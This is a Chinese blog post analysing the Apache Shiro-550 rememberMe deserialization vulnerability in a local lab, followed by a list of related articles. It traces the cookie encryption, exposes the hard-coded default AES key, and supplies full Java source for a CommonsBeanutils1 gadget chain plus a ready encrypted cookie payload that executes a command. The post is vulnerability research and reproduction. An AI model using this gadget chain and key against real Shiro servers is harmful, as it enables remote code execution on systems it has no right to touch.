shiro-550反序列化漏洞原理分析详解

已于 2024-01-25 11:24:49 修改
阅读量1.4k 收藏 37
点赞数 35
分类专栏: 漏洞复现 crypto 文章标签: 加密解密 java 网络安全
于 2024-01-25 11:14:42 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_49490199/article/details/135752129
版权

shiro-550反序列化漏洞原理分析详解

环境搭建

这里的 shiro 环境使用P牛的项目[项目地址],clone 这个项目代码到本地,用 idea 打开

配置maven依赖

打开之后,使用 maven 重新加载一下 pom.xml 中的依赖
在这里插入图片描述

配置 tomcat

右上角点击编辑配置
在这里插入图片描述
添加本地的 tomcat 服务器在这里插入图片描述
选择你 tomcat 解压的目录在这里插入图片描述添加工件的部署
在这里插入图片描述选择shirodemo:war

在这里插入图片描述
然后就可以直接运行起来了

在这里插入图片描述
登录的账号密码在shiro.ini文件中
在这里插入图片描述
使用root:secret就可以成功登录,登录的时候要勾选 Remember me 选项
在这里插入图片描述

漏洞分析

加密流程分析

既然漏洞出现在 rememberMe 字段,那就先分析 rememberMe 的值是如何生成的

先正常登录一次系统,可以获取到一段经过加密的 rememberMe 值

在这里插入图片描述
首先来到登录判断的地方,在 DefaultSecurityManager.java 中进行登录的判断

在这里插入图片描述
在登录成功的函数 onSuccessfulLogin 处下个断点跟进分析
可以看到 token 中存储了登录的账号密码信息

在这里插入图片描述
一直往下跟进,直到 byte[] bytes = serialize(principals);

在这里插入图片描述
发现此处是在对登录的用户名root进行序列化的操作,然后判断加密方式是否为空

在这里插入图片描述
很明显此处不为空,并且根据属性的一些值能够判断,该加密方式为 AES的CBC模式 加密,进入判断,调用encrypt函数对用户名的序列化值 bytes 进行加密

继续跟进encrypt函数,可以发现里面又调用了 cipherService的encrypt函数,并且传入了两个参数

在这里插入图片描述

第一个参数 Serialized 就是传入的root序列化结果
第二个参数调用了 getEncryptionCipherKey() 方法的返回值,其实看方法名大概能够猜出这个方法是用来获取加密的key
跟进这个方法看看,发现就是返回了一个变量encryptionCipherKey 的值

在这里插入图片描述

右键查找一下 encryptionCipherKey 的用法,可以看到这个变量在下面的 setEncryptionCipherKey 方法中被赋值,再看一下谁调用了setEncryptionCipherKey ,发现是 setCipherKey 调用了这个函数

在这里插入图片描述
再继续查找 setCipherKey 的用法,发现该函数传入了 DEFAULT_CIPHER_KEY_BYTES 这个参数

在这里插入图片描述
继续查找 DEFAULT_CIPHER_KEY_BYTES 参数的定义,找到这个参数其实就是一个写死在代码中的字符串kPH+bIxk5D2deZiIxcaaaA==,也就是AES加密 key 的base64编码

在这里插入图片描述
所以,getEncryptionCipherKey()函数就是返回了 kPH+bIxk5D2deZiIxcaaaA== 这个字符串作为加密的 key

再进行跟进 encrypt 函数,发现里面还有个 ivBytes 变量,通过调用 generateInitializationVector(false) 方法获取值

在这里插入图片描述
这里 generateInitializationVector(false) 方法其实就是获取一个16字节是随机值,作为 AES 加密的 iv 值,然后再调用下面的 encrypt 函数,并且传入 序列化的值、key、iv 等参数
在这里插入图片描述
进入到 encrypt 函数中

在这里插入图片描述

  1. 判断 iv 是否为空并且长度要大于 0
  2. 对序列化后的用户名进行 AES CBC模式 的加密,将值赋给encrypted
  3. 创建一个 output 字节数组,并且数组的长度设置为 iv+ encrypted 的总长度
  4. 把 iv 值放到 output 数组中
  5. 把 encrypted 附加到 output 数组中

output数组中最后存储的就是 iv + encrypted (AES加密的序列化用户名),并返回

整个加密流程就是这样的,最后再对 output 进行 base64 编码并赋值给 rememberMe 作为响应头返回,流程就结束了

进行解密验证

验证一下该加密流程,对 rememberMe 字段进行手动解密

在这里插入图片描述
先对字段进行base64解码,在转换成16进制,提取处前面的16字节32位 6e1ba0729b4112174b30a59fef008387 应该就是 iv ,后面剩下的是加密的序列化用户名

在这里插入图片描述
对结果解密后,可以看到该字符串结果确实符合java序列化的格式
在这里插入图片描述

漏洞利用

由于AES是对称加密,所以知道了加密的 key 和 iv 也就知道了解密的 key 和 iv

使用 CB1 链进行命令执行 Calc 命令弹个计算器

注意 CB1 链依赖包的版本要与 shiro 依赖包的版本一致
使用 Maven Helper 插件查看 shiro1.2.4 的依赖包版本

  • commons-beanutils 1.8.3
  • commons-collections 3.2.1
    在这里插入图片描述使用 CB1 链生成执行 Calc 序列化的数据

CB1

package main.java;

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import org.apache.commons.beanutils.BeanComparator;

import javax.xml.transform.TransformerConfigurationException;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;
import java.lang.reflect.InvocationTargetException;
import java.util.Base64;
import java.util.PriorityQueue;

public class CB1 {
    public static void main(String[] args) throws InvocationTargetException, IllegalAccessException, NoSuchMethodException, NoSuchFieldException, TransformerConfigurationException, IOException, ClassNotFoundException {
        //继承了 ABSTRACT_TRANSLET 父类的 Runtime.getRuntime().exec("calc") 的 class 字节码数据
        byte[] code = Base64.getDecoder().decode("yv66vgAAADQAIQoABgATCgAUABUIABYKABQAFwcAGAcAGQEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBAApFeGNlcHRpb25zBwAaAQAJdHJhbnNmb3JtAQByKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO1tMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOylWBwAbAQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEAClNvdXJjZUZpbGUBAA1jb2RlVGVzdC5qYXZhDAAHAAgHABwMAB0AHgEABGNhbGMMAB8AIAEAH2NvbS9odWF3ZWkvQ2xhc3NMb2FkZXIvY29kZVRlc3QBAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0AQATamF2YS9sYW5nL0V4Y2VwdGlvbgEAOWNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9UcmFuc2xldEV4Y2VwdGlvbgEAEWphdmEvbGFuZy9SdW50aW1lAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsAIQAFAAYAAAAAAAMAAQAHAAgAAgAJAAAALgACAAEAAAAOKrcAAbgAAhIDtgAEV7EAAAABAAoAAAAOAAMAAAALAAQADAANAA0ACwAAAAQAAQAMAAEADQAOAAIACQAAABkAAAADAAAAAbEAAAABAAoAAAAGAAEAAAARAAsAAAAEAAEADwABAA0AEAACAAkAAAAZAAAABAAAAAGxAAAAAQAKAAAABgABAAAAFQALAAAABAABAA8AAQARAAAAAgAS");
        TemplatesImpl templates = new TemplatesImpl();

        Field name = templates.getClass().getDeclaredField("_name");
        name.setAccessible(true);
        name.set(templates,"ClearMe");

        Field bytecodes = templates.getClass().getDeclaredField("_bytecodes");
        bytecodes.setAccessible(true);
        bytecodes.set(templates,new byte[][]{code});

        Field tfactory = templates.getClass().getDeclaredField("_tfactory");
        tfactory.setAccessible(true);
        tfactory.set(templates,new TransformerFactoryImpl());

        BeanComparator beanComparator = new BeanComparator();

        PriorityQueue priorityQueue = new PriorityQueue(1, beanComparator);
        priorityQueue.add(1);
        priorityQueue.add(1);

        beanComparator.setProperty("outputProperties");
        Field queue = PriorityQueue.class.getDeclaredField("queue");
        queue.setAccessible(true);
        queue.set(priorityQueue,new Object[]{templates, templates});
        
        //序列化 priorityQueue 生成 ser.bin 文件
        serialize(priorityQueue);
    }
    public static void serialize(Object obj) throws IOException {
        ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("ser.bin"));
        oos.writeObject(obj);
    }
}

运行上述代码后会在当前目录生成一个 ser.bin 文件,这个 ser.bin 中就序列化的命令执行代码

同样使用 AES 的 CBC 模式进行加密,key 为 shrio 中硬编码的 key,iv 随便填写一个16字节长度的数据就行,只是最后要把 iv 放在加密数据的前面
key (bas64编码): kPH+bIxk5D2deZiIxcaaaA==
iv (16进制) :0123456789abcdef0123456789abcdef

在这里插入图片描述
然后再得到的加密数据前加上 iv ,再进行 base64 编码

在这里插入图片描述
将得到的数据作为 cookie 中 rememberMe 字段的参数进行发起请求,就可以成功命令执行

在这里插入图片描述附上此处的 payload :

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

秃头P风侠
关注
专栏目录
shiro550 反序列化漏洞分析
Vicl1fe的博客
03-20 965
环境搭建 我的环境 1、Maven 3.5.2 2、jdk 1.6和jdk1.8(默认java环境是1.8,1.6是用于配置下面的toolchains) 3、IDEA 配置shiro 首先下载shiro-1.2.4:shiro-1.2.4下载。 文件目录如下, 进入samples\web目录下。这就算是漏洞复现的web目录了。 配置Maven 配置一下maven,在maven/conf/toolchains.xml中的toolchains 中添加以下代码。至于为什么要添加,可以看看toolchains的
Shiro 550 反序列化漏洞 详细分析+poc编写
god_Zeo的安全博客
09-03 1万+
0x00 前言 shiro反序列化漏洞这个从 shiro 550 开始,在2016年就爆出来, 但是到现在在各种攻防演练中也起到了显著作用 这个漏洞一直都很好用,特别是一些红蓝对抗HW的下边界突破很好用 遂研究一下这个漏洞的成因和分析一下代码 0x01 Shiro 550 漏洞描述 Apache Shiro RememberMe 反序列化导致的命令执行漏洞 Apache Shiro是一个强大且易用的Java安全框架,执行身份验证、授权、密码和会话管理 编号:Shiro-550, CVE-2016-4437
ApacheShiro反序列化 550 721漏洞
最新发布
saber的博客
10-17 1120
Shiro是一个强大且易用的Java安全框架,执行身份验证、授权、密码和会话管理个漏洞被称为Shiro550是因为在问题跟踪器中,该漏洞最初被标记为第550个问题,721漏洞名称也是由此而来。
Shiro rememberMe反序列化漏洞Shiro-550) 靶场攻略
2301_81881972的博客
09-23 386
使⽤BurpSuite进⾏抓包,在请求包中的cookie字段中添加 rememberMe=123;,看响应包header中是否返回 rememberMe=deleteMe 值,若有,则证明该系统使⽤了Shiro框架。Apache Shiro框架提供了记住密码的功能(RememberMe),⽤户登录成功后会⽣成经过。命令=>序列化=>AES加密=>base64编码=>RememberMe Cookie值。在整个漏洞利⽤过程中,⽐较重要的是AES加密的密钥,如果没有修改默认的密钥那么就很。
漏洞复现】Shiro550反序列漏洞复现和利用(含docker+vulhub环境安装)
weixin_53379921的博客
09-11 1216
序列化(Serialization)是将对象状态信息转换为可以存储或传输的形式(例如,字节流)的过程。这样,以后可以在相同或不同的计算机环境中重新创建该对象。反序列化(Deserialization)是序列化的逆过程,它将之前序列化过程中生成的数据(通常是字节流)转换回原始对象的过程。在反序列化过程中,系统会根据序列化数据中的信息重新创建对象,并恢复对象在序列化时的状态。VUlhub是一个面向大众的开源漏洞靶场,无需Docker知识,简单执行两条命令即可编译、运行一个完整的漏洞靶场镜像。
shiro550反序列化漏洞原理漏洞复现(基于vulhub,保姆级的详细教程)
热门推荐
Bossfrank的博客
04-16 1万+
本文是shiro550漏洞(CVE-2016-4437)的漏洞原理漏洞复现。本文所有使用的工具和脚本都会在文末给出链接。使用vulhub搭建靶场,漏洞复现包括手动构造cookie的payload或使用shiro550的图形化漏洞利用工具,最终实现反弹shell和任意命令执行。
Shiro-550漏洞详解及复现
m0_64481831的博客
03-07 2557
Shiro是Apache的一个强大且易用的Java安全框架,用于执行身份验证、授权、密码和会话管理。借助Shiro易于理解的API,用户可以快速轻松地保护任何应用程序----从最小的移动应用程序到最大的web和企业应用程序。Shiro是一个Java的安全框架,用于执行身份验证、授权、密码和会话验证。
Java反序列化Shiro-550漏洞分析笔记
网络安全从业者的学习笔记
01-29 2170
ShiroAES加密-->Base64加密的过程,接收后会进行Base64解密-->AES解密-->反序列化进行验证身份信息。漏洞点在于AES加密为对称加密,而加密时利用的key为固定值,这就导致,我们可以生成一条恶意的payload,进而达到RCE的目的。
shiro550反序列化漏洞分析
遇事不决冲冲冲
02-06 3589
Apache Shiro是一个开源安全框架,提供身份验证、授权、密码学和会话管理。在Apache Shiro
三分钟彻底弄明白shiro原理
StephenLiousYuan的博客
06-10 3722
目前越来越多的项目都用到了shiro框架,毕竟它简单、容易(呃呃~其实一点都不简单),花三分钟理解下面的三个概念,你就掌握了shiro百分之九十的核心。 一、Subject:主体,代表了当前 “用户”,这个用户不一定是一个具体的人,与当前应用交互的任何东西都是 Subject,如网络爬虫,机器人等;即一个抽象概念;所有 Subject 都绑定到 SecurityManager,与 Subject 的所有交互都会委托给 SecurityManager;可以把 Subject 认为是一个门面;SecurityM
Shiro反序列化漏洞利用详解Shiro-550+Shiro-721)
java_lujj的博客
08-29 3626
Shiro 是一个强大易用的Java安全框架,提供了认证、授权、加密和会话管理等功能,Shiro框架直观、易用、同时也能提供健壮的安全性。、
反序列化漏洞-02】PHP反序列化漏洞实验详解
cc
03-02 2931
序列化:程序将对象状态转换为可存储或传输的字节序列的过程(即对象状态转换为可存储或者可传输的过程){序列化是对象转换为字符串的过程}反序列化:程序把存储或传输的字节序列恢复为对象的过程。{反序列化则是字符串转化为对象的过程}如果字符串客户端可控,就会造成web应用反序列化任意对象,严重的是在反序列化的过程中会触发一些可以执行的php代码,例如phpinfoPHP中的序列化与反序列化,基本都是围绕和两个函数展开的。在介绍这两个函数之前,我们可以先看一个简单的例子。
2020攻防演练弹药库:Apache Shiro 反序列化漏洞详解
相关的文章,如《关于Shiro反序列化漏洞的延伸—升级shiro也能被shell》,提供了更多细节。 2. 使用URLDNS进行检测和提速,这种方法不受JDK版本和安全策略的影响,可以更快地探测到目标系统的漏洞状态。 在进行攻防...
反序列化漏洞原理详解
wadfdhsajd的博客
05-19 469
Apache shiro 简介 Apache Shiro 是一个强大且易用的 Java 安全框架,执行身份验证、授权、密码和会话管理。使用 Shiro 的易于理解的 API,您可以快速、轻松地获得任何应用程序,从最小的移动应用程序到最大的网络和企业应用程序。 本文针对 Shiro 进行了一个原理性的讲解,从源码层面来分析Shiro 的认证和授权的整个流程,并在认证与授权的这个流程讲解冲,穿插说明 rememberme 的作用,以及为何该字段会导致反序列化漏洞。 Apache shiro 认证
Java代码审计之Fastjson反序列化漏洞详解
悦分享
09-16 2217
FastJson 是一个由阿里巴巴研发的java库,FastJson是开源JSON解析库,它可以解析JSON格式的字符串,支持将Java Bean序列化为JSON字符串,也可以从JSON字符串反序列化Java Bean。“自2017年3月15日,fastjson官方主动爆出其在1.2.24及之前版本存在远程代码执行高危安全漏洞以来,各种新型绕过姿势层出不穷。漏洞被利用本质找到一条有效的攻击链,攻击链的末端就是有代码执行能力的类,来达到我们想做的事情,一般都是用来RCE(远程命令执行)。
shiro反序列化漏洞原理分析漏洞复现(Shiro-550/Shiro-721反序列化)
rumil的博客
09-18 2146
shiro-550主要是由shiro的rememberMe内容反序列化导致的命令执行漏洞,造成的原因是默认加密密钥是硬编码在shiro源码中,任何有权访问源代码的人都可以知道默认加密密钥。于是攻击者可以创建一个恶意对象,对其进行序列化、编码,然后将其作为cookie的rememberMe字段内容发送,Shiro 将对其解码和反序列化,导致服务器运行一些恶意代码。特征:cookie中含有rememberMe字段修复建议:更新shiro到1.2.4以上的版本。不使用默认的加密密钥,改为随机生成密钥。
Apache Shiro-550 反序列化漏洞复现
ZXT02的博客
03-02 1560
Apache Shiro550反序列化(CVE-2016-4437)漏洞分析、复现及修复。
反序列化-Shiro-550详细分析
鸣蜩十四的博客
07-18 1416
Shiro-550漏洞是攻击者直接就可以用密钥实现框架加密过程,在Cookie字段写入想要服务端执行的恶意代码,最后服务端在对cookie进行解密的时候(反序列化后)就会执行恶意代码
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值